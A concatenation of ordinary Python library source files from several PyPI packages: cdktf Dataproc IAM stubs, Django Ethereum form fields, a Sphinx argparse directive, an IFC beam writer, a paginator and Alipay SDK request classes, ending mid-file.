provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
cluster: builtins.str,
id: typing.Optional[builtins.str] = None,
project: typing.Optional[builtins.str] = None,
region: typing.Optional[builtins.str] = None,
) -> None:
'''
:param connection:
:param count:
:param depends_on:
:param for_each:
:param lifecycle:
:param provider:
:param provisioners:
:param cluster: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#cluster DataGoogleDataprocClusterIamPolicy#cluster}.
:param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#id DataGoogleDataprocClusterIamPolicy#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
:param project: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#project DataGoogleDataprocClusterIamPolicy#project}.
:param region: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#region DataGoogleDataprocClusterIamPolicy#region}.
'''
if isinstance(lifecycle, dict):
lifecycle = _cdktf_9a9027ec.TerraformResourceLifecycle(**lifecycle)
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__9f3314323e9558f8280eaa333ea022b63e82943b2d882379b87f673a9709bb3f)
check_type(argname="argument connection", value=connection, expected_type=type_hints["connection"])
check_type(argname="argument count", value=count, expected_type=type_hints["count"])
check_type(argname="argument depends_on", value=depends_on, expected_type=type_hints["depends_on"])
check_type(argname="argument for_each", value=for_each, expected_type=type_hints["for_each"])
check_type(argname="argument lifecycle", value=lifecycle, expected_type=type_hints["lifecycle"])
check_type(argname="argument provider", value=provider, expected_type=type_hints["provider"])
check_type(argname="argument provisioners", value=provisioners, expected_type=type_hints["provisioners"])
check_type(argname="argument cluster", value=cluster, expected_type=type_hints["cluster"])
check_type(argname="argument id", value=id, expected_type=type_hints["id"])
check_type(argname="argument project", value=project, expected_type=type_hints["project"])
check_type(argname="argument region", value=region, expected_type=type_hints["region"])
self._values: typing.Dict[builtins.str, typing.Any] = {
"cluster": cluster,
}
if connection is not None:
self._values["connection"] = connection
if count is not None:
self._values["count"] = count
if depends_on is not None:
self._values["depends_on"] = depends_on
if for_each is not None:
self._values["for_each"] = for_each
if lifecycle is not None:
self._values["lifecycle"] = lifecycle
if provider is not None:
self._values["provider"] = provider
if provisioners is not None:
self._values["provisioners"] = provisioners
if id is not None:
self._values["id"] = id
if project is not None:
self._values["project"] = project
if region is not None:
self._values["region"] = region
@builtins.property
def connection(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]]:
'''
:stability: experimental
'''
result = self._values.get("connection")
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]], result)
@builtins.property
def count(
self,
) -> typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]]:
'''
:stability: experimental
'''
result = self._values.get("count")
return typing.cast(typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]], result)
@builtins.property
def depends_on(
self,
) -> typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]]:
'''
:stability: experimental
'''
result = self._values.get("depends_on")
return typing.cast(typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]], result)
@builtins.property
def for_each(self) -> typing.Optional[_cdktf_9a9027ec.ITerraformIterator]:
'''
:stability: experimental
'''
result = self._values.get("for_each")
return typing.cast(typing.Optional[_cdktf_9a9027ec.ITerraformIterator], result)
@builtins.property
def lifecycle(self) -> typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle]:
'''
:stability: experimental
'''
result = self._values.get("lifecycle")
return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle], result)
@builtins.property
def provider(self) -> typing.Optional[_cdktf_9a9027ec.TerraformProvider]:
'''
:stability: experimental
'''
result = self._values.get("provider")
return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformProvider], result)
@builtins.property
def provisioners(
self,
) -> typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]]:
'''
:stability: experimental
'''
result = self._values.get("provisioners")
return typing.cast(typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]], result)
@builtins.property
def cluster(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#cluster DataGoogleDataprocClusterIamPolicy#cluster}.'''
result = self._values.get("cluster")
assert result is not None, "Required property 'cluster' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def id(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#id DataGoogleDataprocClusterIamPolicy#id}.
Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2.
If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
'''
result = self._values.get("id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def project(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#project DataGoogleDataprocClusterIamPolicy#project}.'''
result = self._values.get("project")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def region(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#region DataGoogleDataprocClusterIamPolicy#region}.'''
result = self._values.get("region")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "DataGoogleDataprocClusterIamPolicyConfig(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"DataGoogleDataprocClusterIamPolicy",
"DataGoogleDataprocClusterIamPolicyConfig",
]
publication.publish()
def _typecheckingstub__cbdfc1f5a161228c95adde0ef989c835403cd8a2a6d7d35d4a6f667c9742957c(
scope: _constructs_77d1e7e8.Construct,
id_: builtins.str,
*,
cluster: builtins.str,
id: typing.Optional[builtins.str] = None,
project: typing.Optional[builtins.str] = None,
region: typing.Optional[builtins.str] = None,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__67280ce663d29e99ee680c97ad49e21873bf5297e614bbfa1d689f303ab2d9de(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__0266c902d95c3d72fa1317421c12f5cf1bc00a01fa73ed24a7a26b9e996392d3(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__1312e1730d0d6933657866c713a1fdd67708e8ba1b651ff6dfaaef802b69b03f(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__63425cc9344a331ec9c0bbbc56dde35d3e72dd90dff0cb50fc7fa47f4baef589(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__9f3314323e9558f8280eaa333ea022b63e82943b2d882379b87f673a9709bb3f(
*,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
cluster: builtins.str,
id: typing.Optional[builtins.str] = None,
project: typing.Optional[builtins.str] = None,
region: typing.Optional[builtins.str] = None,
) -> None:
"""Type checking stubs"""
pass
|
PypiClean
|
/safe_pls_py-5.4.3-py3-none-any.whl/gnosis/eth/django/forms.py
|
import binascii
from typing import Any, Optional
from django import forms
from django.core import exceptions
from django.core.exceptions import ValidationError
from django.utils.translation import gettext as _
from hexbytes import HexBytes
from gnosis.eth.utils import fast_is_checksum_address
class EthereumAddressFieldForm(forms.CharField):
default_error_messages = {
"invalid": _("Enter a valid checksummed Ethereum Address."),
}
def prepare_value(self, value):
return value
def to_python(self, value):
value = super().to_python(value)
if value in self.empty_values:
return None
elif not fast_is_checksum_address(value):
raise ValidationError(self.error_messages["invalid"], code="invalid")
return value
class HexFieldForm(forms.CharField):
default_error_messages = {
"invalid": _("Enter a valid hexadecimal."),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.empty_value = None
def prepare_value(self, value: memoryview) -> str:
if value:
return "0x" + bytes(value).hex()
else:
return ""
def to_python(self, value: Optional[Any]) -> Optional[HexBytes]:
if value in self.empty_values:
return self.empty_value
try:
if isinstance(value, str):
value = value.strip()
return HexBytes(value)
except (binascii.Error, TypeError, ValueError):
raise exceptions.ValidationError(
self.error_messages["invalid"],
code="invalid",
params={"value": value},
)
class Keccak256FieldForm(HexFieldForm):
default_error_messages = {
"invalid": _('"%(value)s" is not a valid keccak256 hash.'),
"length": _('"%(value)s" keccak256 hash should be 32 bytes.'),
}
def prepare_value(self, value: str) -> str:
# Keccak field already returns a hex str
return value
def to_python(self, value: Optional[Any]) -> HexBytes:
value: Optional[HexBytes] = super().to_python(value)
if value and len(value) != 32:
raise ValidationError(
self.error_messages["length"],
code="length",
params={"value": value.hex()},
)
return value
|
PypiClean
|
/livestreamer-1.12.2.tar.gz/livestreamer-1.12.2/docs/ext_argparse.py
|
import argparse
import re
from collections import namedtuple
from textwrap import dedent
from docutils import nodes
from docutils.parsers.rst.directives import unchanged
from docutils.statemachine import ViewList
from sphinx.util.nodes import nested_parse_with_titles
from sphinx.util.compat import Directive
_ArgumentParser = argparse.ArgumentParser
_Argument = namedtuple("Argument", ["args", "options"])
_block_re = re.compile(r":\n{2}\s{2}")
_default_re = re.compile(r"Default is (.+)\.\n")
_note_re = re.compile(r"Note: (.*)\n\n", re.DOTALL)
_option_re = re.compile(r"(--[\w-]+)")
class ArgumentParser(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.groups = []
self.arguments = []
def add_argument(self, *args, **options):
if not options.get("help") == argparse.SUPPRESS:
self.arguments.append(_Argument(args, options))
def add_argument_group(self, *args, **options):
group = ArgumentParser(*args, **options)
self.groups.append(group)
return group
def get_parser(module_name, attr):
argparse.ArgumentParser = ArgumentParser
module = __import__(module_name, globals(), locals(), [attr])
argparse.ArgumentParser = _ArgumentParser
return getattr(module, attr)
def indent(value, length=4):
space = " " * length
return "\n".join(space + line for line in value.splitlines())
class ArgparseDirective(Directive):
has_content = True
option_spec = {
"module": unchanged,
"attr": unchanged,
}
def process_help(self, help):
# Dedent the help to make sure we are always dealing with
# non-indented text.
help = dedent(help)
# Create simple blocks.
help = _block_re.sub("::\n\n ", help)
# Boldify the default value.
help = _default_re.sub(r"Default is: **\1**.\n", help)
# Create note directives from "Note: " paragraphs.
help = _note_re.sub(
lambda m: ".. note::\n\n" + indent(m.group(1)) + "\n\n",
help
)
# Replace option references with links.
help = _option_re.sub(
lambda m: (
":option:`{0}`".format(m.group(1))
if m.group(1) in self._available_options
else m.group(1)
),
help
)
return indent(help)
def generate_group_rst(self, group):
for arg in group.arguments:
help = arg.options.get("help")
metavar = arg.options.get("metavar")
if isinstance(metavar, tuple):
metavar = " ".join(metavar)
if metavar:
optional = arg.options.get("nargs") == "?"
if optional:
metavar = "[{0}]".format(metavar)
options = []
for a in arg.args:
if a.startswith("-"):
options.append("{0} {1}".format(a, metavar))
else:
options.append(metavar)
else:
options = arg.args
yield ".. option:: {0}".format(", ".join(options))
yield ""
for line in self.process_help(help).split("\n"):
yield line
yield ""
def generate_parser_rst(self, parser):
for group in parser.groups:
title = group.args[0]
yield ""
yield title
yield "^" * len(title)
for line in self.generate_group_rst(group):
yield line
def run(self):
module = self.options.get("module")
attr = self.options.get("attr")
parser = get_parser(module, attr)
self._available_options = []
for group in parser.groups:
for arg in group.arguments:
self._available_options += arg.args
node = nodes.section()
node.document = self.state.document
result = ViewList()
for line in self.generate_parser_rst(parser):
result.append(line, "argparse")
nested_parse_with_titles(self.state, result, node)
return node.children
def setup(app):
app.add_directive("argparse", ArgparseDirective)
|
PypiClean
|
/ada-py-0.0.40a4.tar.gz/ada-py-0.0.40a4/src/ada/ifc/write/write_beams.py
|
from __future__ import annotations
from dataclasses import dataclass
from typing import TYPE_CHECKING
import numpy as np
from ada import Beam, CurvePoly, CurveRevolve
from ada.config import Settings
from ada.core.constants import O
from ada.ifc.utils import (
add_colour,
convert_bm_jusl_to_ifc,
create_guid,
create_ifc_placement,
create_local_placement,
ifc_dir,
ifc_p,
to_real,
)
from ada.ifc.write.write_curves import write_curve_poly
if TYPE_CHECKING:
from ifcopenshell import file as ifile
from ada.ifc.store import IfcStore
def write_ifc_beam(ifc_store: IfcStore, beam: Beam):
ibw = IfcBeamWriter(ifc_store)
return ibw.create_ifc_beam(beam)
@dataclass
class IfcBeamWriter:
ifc_store: IfcStore
def create_ifc_beam(self, beam: Beam):
if beam.parent is None:
raise ValueError("Parent cannot be None for IFC export")
f = self.ifc_store.f
owner_history = self.ifc_store.owner_history
profile = self.ifc_store.get_profile_def(beam.section)
if isinstance(beam.curve, CurveRevolve):
axis, body, loc_plac = create_revolved_beam(beam, f, profile)
elif isinstance(beam.curve, CurvePoly):
axis, body, loc_plac = create_polyline_beam(beam, f, profile)
else:
if beam.curve is not None:
raise ValueError(f'Unrecognized beam.curve "{type(beam.curve)}"')
axis, body, loc_plac = extrude_straight_beam(beam, f, profile)
prod_def_shp = f.create_entity("IfcProductDefinitionShape", None, None, (axis, body))
ifc_beam = f.create_entity(
"IfcBeam",
GlobalId=beam.guid,
OwnerHistory=owner_history,
Name=beam.name,
Description=beam.section.sec_str,
ObjectType="Beam",
ObjectPlacement=loc_plac,
Representation=prod_def_shp,
)
found_existing_relationship = False
beam_type = self.ifc_store.get_beam_type(beam.section)
if beam_type is None:
raise ValueError()
for ifcrel in f.by_type("IfcRelDefinesByType"):
if ifcrel.RelatingType == beam_type:
ifcrel.RelatedObjects = tuple([*ifcrel.RelatedObjects, ifc_beam])
found_existing_relationship = True
break
if found_existing_relationship is False:
f.create_entity(
"IfcRelDefinesByType",
GlobalId=create_guid(),
OwnerHistory=owner_history,
Name=beam.section.type.value,
Description=None,
RelatedObjects=[ifc_beam],
RelatingType=beam_type,
)
self.add_material_assignment(beam, ifc_beam)
return ifc_beam
def add_material_assignment(self, beam: Beam, ifc_beam):
sec = beam.section
mat = beam.material
ifc_store = self.ifc_store
f = ifc_store.f
ifc_mat_rel = ifc_store.f.by_guid(mat.guid)
ifc_mat = ifc_mat_rel.RelatingMaterial
ifc_profile = ifc_store.get_profile_def(beam.section)
mat_profile = f.createIfcMaterialProfile(
sec.name, "A material profile", ifc_mat, ifc_profile, None, "LoadBearing"
)
mat_profile_set = f.createIfcMaterialProfileSet(sec.name, None, [mat_profile], None)
mat_usage = f.create_entity("IfcMaterialProfileSetUsage", mat_profile_set, convert_bm_jusl_to_ifc(beam))
ifc_store.writer.create_rel_associates_material(create_guid(), mat_usage, [ifc_beam])
ifc_store.writer.associate_elem_with_material(beam.material, ifc_beam)
return mat_profile_set
def extrude_straight_beam(beam: Beam, f: ifile, profile):
extrude_dir = ifc_dir(f, (0.0, 0.0, 1.0))
parent = f.by_guid(beam.parent.guid)
a = beam.parent.get_assembly()
global_placement = create_local_placement(f, relative_to=parent.ObjectPlacement)
e1 = (0.0, 0.0, 0.0)
vec = beam.xvec
yvec = beam.yvec
if Settings.model_export.include_ecc and beam.e1 is not None:
e1 = beam.e1
vec = beam.xvec_e
profile_e = None
if beam.taper is not None and beam.section != beam.taper:
profile_e = f.by_guid(beam.taper.guid)
# Transform coordinates to local coords
p1 = tuple([float(x) + float(e1[i]) for i, x in enumerate(beam.n1.p.copy())])
p2 = p1 + np.array([0, 0, 1]) * beam.length
p1_ifc = f.create_entity("IfcCartesianPoint", to_real(p1))
p2_ifc = f.create_entity("IfcCartesianPoint", to_real(p2))
ifc_polyline = f.create_entity("IfcPolyLine", [p1_ifc, p2_ifc])
global_origin = f.createIfcCartesianPoint(O)
ifc_axis2plac3d = f.create_entity("IfcAxis2Placement3D", global_origin, None, None)
if profile_e is not None:
extrude_area_solid = f.create_entity(
"IfcExtrudedAreaSolidTapered", profile, ifc_axis2plac3d, extrude_dir, beam.length, profile_e
)
else:
extrude_area_solid = f.create_entity("IfcExtrudedAreaSolid", profile, ifc_axis2plac3d, extrude_dir, beam.length)
# Add colour
if beam.colour is not None:
add_colour(f, extrude_area_solid, str(beam.colour), beam.colour)
body_context = a.ifc_store.get_context("Body")
axis_context = a.ifc_store.get_context("Axis")
ax23d = f.create_entity("IfcAxis2Placement3D", p1_ifc, ifc_dir(f, vec), ifc_dir(f, yvec))
loc_plac = f.create_entity("IfcLocalPlacement", global_placement, ax23d)
body = f.create_entity("IfcShapeRepresentation", body_context, "Body", "SweptSolid", [extrude_area_solid])
axis = f.create_entity("IfcShapeRepresentation", axis_context, "Axis", "Curve3D", [ifc_polyline])
return body, axis, loc_plac
def create_revolved_beam(beam: Beam, f: "ifile", profile):
a = beam.parent.get_assembly()
body_context = a.ifc_store.get_context("Body")
axis_context = a.ifc_store.get_context("Axis")
curve: CurveRevolve = beam.curve
ifc_trim_curve = create_ifc_trimmed_curve(curve, f)
placement = create_local_placement(f, curve.p1, (0, 0, 1))
solid = create_ifcrevolveareasolid(f, profile, placement, curve.p1, curve.rot_axis, np.deg2rad(curve.angle))
axis = f.create_entity("IfcShapeRepresentation", axis_context, "Axis", "Curve3D", [ifc_trim_curve])
body = f.create_entity("IfcShapeRepresentation", body_context, "Body", "SweptSolid", [solid])
return body, axis, placement
def create_ifc_trimmed_curve(curve: CurveRevolve, f: "ifile"):
loc_plac = create_ifc_placement(f, origin=curve.rot_origin)
ifc_circle = f.create_entity("IFCCIRCLE", loc_plac, curve.radius)
param1 = (f.create_entity("IFCPARAMETERVALUE", 0.0), ifc_p(f, curve.p1))
param2 = (f.create_entity("IFCPARAMETERVALUE", np.deg2rad(curve.angle)), ifc_p(f, curve.p2))
trim_curve = f.create_entity(
"IFCTRIMMEDCURVE",
BasisCurve=ifc_circle,
Trim1=param1,
Trim2=param2,
SenseAgreement=True,
MasterRepresentation="PARAMETER",
)
return trim_curve
def create_ifcrevolveareasolid(f, profile, ifcaxis2placement, origin, revolve_axis, revolve_angle):
"""Creates an IfcExtrudedAreaSolid from a list of points, specified as Python tuples"""
ifcaxis1dir = f.create_entity("IfcAxis1Placement", ifc_p(f, origin), ifc_dir(f, revolve_axis))
return f.create_entity("IfcRevolvedAreaSolid", profile, ifcaxis2placement, ifcaxis1dir, revolve_angle)
def create_polyline_beam(beam, f, profile):
ifc_polyline = write_curve_poly(beam.curve)
extrude_dir = ifc_dir(f, (0.0, 0.0, 1.0))
global_placement = create_ifc_placement(f)
extrude_area_solid = f.create_entity(
"IfcFixedReferenceSweptAreaSolid", profile, global_placement, ifc_polyline, 0.0, 1.0, extrude_dir
)
loc_plac = create_ifc_placement(f)
return extrude_area_solid, loc_plac, ifc_polyline
def sweep_beam(beam, f, profile, global_placement, extrude_dir):
ifc_polyline = write_curve_poly(beam.curve)
extrude_area_solid = f.create_entity(
"IfcFixedReferenceSweptAreaSolid", profile, global_placement, ifc_polyline, 0.0, 1.0, extrude_dir
)
loc_plac = create_ifc_placement(f)
return extrude_area_solid, loc_plac, ifc_polyline
|
PypiClean
|
/torweb-for-3-0.1.10.tar.gz/torweb-for-3-0.1.10/torweb/paginator.py
|
from math import ceil
class InvalidPage(Exception):
pass
class PageNotAnInteger(InvalidPage):
pass
class EmptyPage(InvalidPage):
pass
class Paginator(object):
def __init__(self, object_list, per_page, orphans=0, allow_empty_first_page=True,
expr=None,distinct=False,unit_name=u'条',total_count=None):
self.object_list = object_list
self.per_page = per_page
self.orphans = orphans
self.unit_name = unit_name
self.allow_empty_first_page = allow_empty_first_page
self._num_pages = None
self._count = total_count
self._count_expr = expr
self._distinct = distinct
def validate_number(self, number):
"Validates the given 1-based page number."
try:
number = int(number)
except (TypeError, ValueError):
raise PageNotAnInteger('That page number is not an integer')
if number < 1:
raise EmptyPage('That page number is less than 1')
if number > self.num_pages:
if number == 1 and self.allow_empty_first_page:
pass
else:
raise EmptyPage('That page contains no results')
return number
def page(self, number):
"Returns a Page object for the given 1-based page number."
number = self.validate_number(number)
bottom = (number - 1) * self.per_page
top = bottom + self.per_page
if top + self.orphans >= self.count:
top = self.count
return Page(self.object_list[bottom:top], number, self)
def _get_count(self):
"Returns the total number of objects, across all pages."
if self._count is None:
try:
if self._distinct:
self._count = self.object_list.count(expr=self._count_expr,distinct=self._distinct)
else:
self._count = self.object_list.count()
except (AttributeError, TypeError):
# AttributeError if object_list has no count() method.
# TypeError if object_list.count() requires arguments
# (i.e. is of type list).
self._count = len(self.object_list)
return self._count
count = property(_get_count)
def _get_num_pages(self):
"Returns the total number of pages."
if self._num_pages is None:
if self.count == 0 and not self.allow_empty_first_page:
self._num_pages = 0
else:
hits = max(1, self.count - self.orphans)
self._num_pages = int(ceil(hits / float(self.per_page)))
return self._num_pages
num_pages = property(_get_num_pages)
def _get_page_range(self):
"""
Returns a 1-based range of pages for iterating through within
a template for loop.
"""
return range(1, self.num_pages + 1)
page_range = property(_get_page_range)
QuerySetPaginator = Paginator # For backwards-compatibility.
class Page(object):
def __init__(self, object_list, number, paginator):
self.object_list = object_list
self.number = number
self.paginator = paginator
def __repr__(self):
return '<Page %s of %s>' % (self.number, self.paginator.num_pages)
#def __len__(self):
# return len(self.object_list)
def __getitem__(self, index):
# The object_list is converted to a list so that if it was a QuerySet
# it won't be a database hit per __getitem__.
return list(self.object_list)[index]
# The following four methods are only necessary for Python <2.6
# compatibility (this class could just extend 2.6's collections.Sequence).
def __iter__(self):
i = 0
try:
while True:
v = self[i]
yield v
i += 1
except IndexError:
return
def __contains__(self, value):
for v in self:
if v == value:
return True
return False
def index(self, value):
for i, v in enumerate(self):
if v == value:
return i
raise ValueError
def count(self, value):
return sum([1 for v in self if v == value])
# End of compatibility methods.
def has_next(self):
return self.number < self.paginator.num_pages
def has_previous(self):
return self.number > 1
def has_other_pages(self):
return self.has_previous() or self.has_next()
def next_page_number(self):
return self.number + 1
def previous_page_number(self):
return self.number - 1
def start_index(self):
"""
Returns the 1-based index of the first object on this page,
relative to total objects in the paginator.
"""
# Special case, return zero if no items.
if self.paginator.count == 0:
return 0
return (self.paginator.per_page * (self.number - 1)) + 1
def end_index(self):
"""
Returns the 1-based index of the last object on this page,
relative to total objects found (hits).
"""
# Special case for the last page because there can be orphans.
if self.number == self.paginator.num_pages:
return self.paginator.count
return self.number * self.paginator.per_page
|
PypiClean
|
/alipay-python-3.3.17.tar.gz/alipay-python-3.3.17/alipay/aop/api/request/AlipayEbppJfexportBillCreateRequest.py
|
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayEbppJfexportBillCreateModel import AlipayEbppJfexportBillCreateModel
class AlipayEbppJfexportBillCreateRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayEbppJfexportBillCreateModel):
self._biz_content = value
else:
self._biz_content = AlipayEbppJfexportBillCreateModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.ebpp.jfexport.bill.create'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
|
PypiClean
|
/alipay_sdk_python-3.6.740-py3-none-any.whl/alipay/aop/api/request/KoubeiSalesKbassetStuffProduceorderBatchqueryRequest.py
|
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.KoubeiSalesKbassetStuffProduceorderBatchqueryModel import KoubeiSalesKbassetStuffProduceorderBatchqueryModel
class KoubeiSalesKbassetStuffProduceorderBatchqueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, KoubeiSalesKbassetStuffProduceorderBatchqueryModel):
self._biz_content = value
else:
self._biz_content = KoubeiSalesKbassetStuffProduceorderBatchqueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
